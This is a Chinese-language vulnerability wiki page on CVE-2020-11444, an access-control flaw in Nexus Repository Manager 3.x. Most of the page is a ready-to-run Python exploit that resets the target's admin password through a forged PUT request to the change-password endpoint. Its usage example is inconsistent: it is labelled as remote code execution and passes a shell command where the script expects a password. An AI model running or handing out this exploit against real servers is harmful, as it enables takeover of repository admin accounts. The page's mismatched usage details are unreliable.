menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞 chevron_right (CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞.md
    2.64 KB / 2021-07-15 19:57:50
        (CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞
===========================================================

一、漏洞简介
------------

该漏洞源于不正确的访问控制。攻击者可借助特制的请求利用该漏洞绕过访问限制。

二、漏洞影响
------------

Nexus Repository Manager 3.x版本至3.21.2版本

三、复现过程
------------

    cve-2020-11444_exp.py
    python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
    #!/usr/bin/python3
    # -*- coding:utf-8 -*-
    # author:zhzyker
    # from:https://github.com/zhzyker/exphub

    import sys
    import requests

    if len(sys.argv)!=4:
        print('+-----------------------------------------------------------------------------------------------+')
        print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
        print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password                          +')
        print('+-----------------------------------------------------------------------------------------------+')
        print('+ USE: python3 <filename> <url> <session> <password>                                            +')
        print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
        print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
        print('+-----------------------------------------------------------------------------------------------+')
        sys.exit(0)

    url = sys.argv[1]
    vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
    session = sys.argv[2]
    password = sys.argv[3]

    headers = {
        'accept': "application/json",
        'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
        'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
        'Content-Type': "text/plain",
        'Origin': "http://127.0.0.1:8081",
        'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID="+session+""
    }
    data = """%s""" % password

    r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
    if r.status_code == 204:
        print ("[+] Passowrd Change Success")
        print ("[+] " + url)
        print ("[+] Username:admin Passowrd:"+password+"")
    else:
        print ("[-] SessionID Not available")
        print ("[-] Target Not CVE-2020-11444 Vuln Good Luck")
        sys.exit(0)

参考链接
--------

> https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444\_exp.py
    links
    file_download